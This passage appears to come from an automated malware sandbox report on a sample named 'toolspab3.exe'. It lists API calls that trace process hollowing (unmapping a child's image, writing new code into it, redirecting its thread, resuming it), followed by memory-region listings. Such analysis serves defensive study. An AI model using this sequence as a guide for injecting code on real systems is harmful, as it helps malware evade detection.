dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x5e0000 [0089.951] GetThreadContext (in: hThread=0x114, lpContext=0x5e0000 | out: lpContext=0x5e0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x38f000, Edx=0x0, Ecx=0x0, Eax=0x4194d0, Ebp=0x0, Eip=0x772d8fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0089.979] ReadProcessMemory (in: hProcess=0x118, lpBaseAddress=0x38f008, lpBuffer=0x199474, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x199474*, lpNumberOfBytesRead=0x0) returned 1 [0089.979] NtUnmapViewOfSection (ProcessHandle=0x118, BaseAddress=0x400000) returned 0x0 [0089.979] VirtualAllocEx (hProcess=0x118, lpAddress=0x400000, dwSize=0x9000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0089.979] NtWriteVirtualMemory (in: ProcessHandle=0x118, BaseAddress=0x400000, Buffer=0x315a0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x315a0*, NumberOfBytesWritten=0x0) returned 0x0 [0089.981] NtWriteVirtualMemory (in: ProcessHandle=0x118, BaseAddress=0x401000, Buffer=0x317a0*, NumberOfBytesToWrite=0x7200, NumberOfBytesWritten=0x0 | out: Buffer=0x317a0*, NumberOfBytesWritten=0x0) returned 0x0 [0089.983] WriteProcessMemory (in: hProcess=0x118, lpBaseAddress=0x38f008, lpBuffer=0x31654*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x31654*, lpNumberOfBytesWritten=0x0) returned 1 [0089.987] SetThreadContext (hThread=0x114, lpContext=0x5e0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x38f000, Edx=0x0, Ecx=0x0, Eax=0x402f47, Ebp=0x0, Eip=0x772d8fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0089.987] ResumeThread (hThread=0x114) returned 0x1 [0090.021] CloseHandle (hObject=0x114) returned 1 [0090.021] CloseHandle (hObject=0x118) returned 1 [0090.021] ExitProcess (uExitCode=0x0) [0090.021] HeapValidate (hHeap=0x680000, dwFlags=0x0, lpMem=0x6805a8) returned 1 [0090.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6805a8 | out: hHeap=0x680000) returned 1 Thread: id = 2 os_tid = 0x131c Process: id = "2" image_name = "toolspab3.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\toolspab3.exe" page_root = "0x56483000" os_pid = "0x1314" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xc14" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 320 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 321 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 322 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 323 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 324 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 325 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 326 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 327 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 328 start_va = 0x400000 end_va = 0x4d3fff monitored = 1 entry_point = 0x4194d0 region_type = mapped_file name = "toolspab3.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\toolspab3.exe") Region: id = 329 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 330 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 331 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 332 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 333 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 334 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 336 start_va = 0x400000 end_va = 0x408fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 337 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 338 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 339 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 340 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 341 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 342 start_va = 0x410000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 343 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 344 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 345 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 346 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 347 start_va = 0x460000 end_va = 0x51dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 348 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 349 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 350 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 351 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 352 start_va = 0x410000 end_va = 0x439fff monitored = 0 entry_point = 0x415680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 353 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 354 start_va = 0x6f0000 end_va = 0x877fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 355 start_va = 